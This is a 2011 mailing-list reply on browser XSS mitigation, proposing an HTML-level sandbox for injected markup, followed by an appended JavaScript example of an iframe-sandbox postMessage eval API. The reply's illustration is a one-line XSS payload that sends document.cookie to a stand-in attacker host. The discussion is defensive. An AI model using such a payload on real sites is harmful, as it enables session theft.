Re: XSS mitigation in browsers

On 21 January 2011 00:06, sird@rckc.at <sird@rckc.at> wrote:

> @Gareth
> There is a native sandbox now.. iframe@sandbox can be used to sandbox
> scripts, just throw some:
>
>  onmessage=function(e){
>     e.source.postMessage(eval(e.data.code),e.origin);
>  }
>
> on an iframe and put it in an iframe@sandbox="allow-scripts", and you've
> got a sandbox API :P
>

Yeah, that's an iframe sandbox; I'm talking about a general HTML sandbox. If
you inject a DIV tag then you want to be able to sandbox it. Let's say for
instance I inject:

<div onmouseover="alert(1);new Image().src='//evilsite.com/?'+document.cookie">test</div>

so in this instance the browser detects the injection and then sandboxes the
injection and the partial HTML it encloses, so we get an "alert(1)", we get a
new image but because it's sandboxed the document.cookie isn't sent and the
external domain isn't called.

Received on Friday, 21 January 2011 09:04:03 UTC
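The "sandbox API" sketched in the quoted reply, filled out as a host/guest pair. This is an added example, not code from either poster: the function names (makeGuestHandler, makeHost, loopback, runInLoopback) and the message shape ({id, code} in, {id, ok, value|error} out) are this example's own choices. The guest runs inside an iframe with sandbox="allow-scripts" and no allow-same-origin, so it has an opaque origin and cannot touch the embedder's DOM, cookies or storage; the host matches replies to requests by id and only accepts them from the frame's own window. Two things the example makes visible that the one-liner does not: the opaque origin forces the host to post with targetOrigin "*", so nothing secret may be handed to the frame; and the sandbox isolates the evaluated code from the embedder's origin but does not stop it from loading subresources (a `new Image().src` to an outside host still fires), which is exactly the gap the reply's hypothetical HTML-level sandbox would have to close.

```javascript
// Added example: iframe@sandbox="allow-scripts" + postMessage as a sandbox API.
// Names and message format are this example's own, not from the thread.

// Guest side: runs inside the sandboxed frame. Without allow-same-origin the
// frame has an opaque origin, so evaluated code cannot read the embedder's
// DOM, cookies or storage (it can still issue network requests, though).
function makeGuestHandler(evaluate) {
  return function onmessage(e) {
    const msg = e.data;
    if (!msg || typeof msg.id !== 'number' || typeof msg.code !== 'string') return;
    let reply;
    try {
      reply = { id: msg.id, ok: true, value: evaluate(msg.code) };
    } catch (err) {
      reply = { id: msg.id, ok: false, error: String((err && err.message) || err) };
    }
    // e.origin is the embedder's origin: the reply is addressed to it alone.
    e.source.postMessage(reply, e.origin);
  };
}

// Host side. Replies are matched to requests by id and accepted only when
// they come from the frame's own window; anything else is dropped.
function makeHost(frameWindow, postToFrame) {
  let nextId = 1;
  const pending = new Map();
  function run(code, cb) {
    const id = nextId++;
    pending.set(id, cb);
    // The frame's origin is opaque ("null"), so the only usable targetOrigin
    // is "*": never give the frame anything worth stealing.
    postToFrame({ id, code });
  }
  function onmessage(e) {
    if (e.source !== frameWindow) return;
    const r = e.data;
    if (!r || !pending.has(r.id)) return;
    const cb = pending.get(r.id);
    pending.delete(r.id);
    if (r.ok) cb(null, r.value); else cb(new Error(r.error), undefined);
  }
  return { run, onmessage, outstanding: () => pending.size };
}

// Indirect eval: evaluates in the frame's global scope, not in the handler's
// local scope, so the caller cannot reach the handler's own variables.
function evaluateGlobally(code) { return (0, eval)(code); }

// Stand-alone wiring with two stand-in windows so the protocol can be run
// outside a browser (e.g. in Node). Delivery is synchronous here.
function loopback() {
  const hostWin = {};
  const guestWin = {};
  const guest = makeGuestHandler(evaluateGlobally);
  let host;
  hostWin.postMessage = (data, origin) => host.onmessage({ data, origin, source: guestWin });
  guestWin.postMessage = (data, origin) => guest({ data, origin, source: hostWin });
  host = makeHost(guestWin, msg => guestWin.postMessage(msg, '*'));
  return host;
}

// Helper for the loopback case: returns {ok, value} or {ok, error}.
function runInLoopback(host, code) {
  let out = null;
  host.run(code, (err, value) => {
    out = err ? { ok: false, error: err.message } : { ok: true, value };
  });
  return out;
}

// Real browser wiring: the same guest code is shipped into a sandboxed srcdoc
// frame. Serve the embedder over http(s): from file:// its origin is also
// "null" and the guest cannot address its reply.
if (typeof document !== 'undefined') {
  const frame = document.createElement('iframe');
  frame.setAttribute('sandbox', 'allow-scripts');   // deliberately no allow-same-origin
  frame.srcdoc = '<script>' + makeGuestHandler.toString() +
    ';onmessage = makeGuestHandler(function (c) { return (0, eval)(c); });</script>';
  frame.onload = () => {
    const host = makeHost(frame.contentWindow, m => frame.contentWindow.postMessage(m, '*'));
    window.addEventListener('message', host.onmessage);
    // Expect ["null", ""]: opaque origin, and no cookies visible in the frame.
    host.run('[location.origin, document.cookie]', (err, v) => console.log(err || v));
  };
  document.body.appendChild(frame);
}
```

Loaded in a browser page the script creates the frame and logs the guest's view of its own origin; under Node only the loopback path is exercised, which is enough to check the request/reply bookkeeping and the source check that keeps a third window from forging a reply.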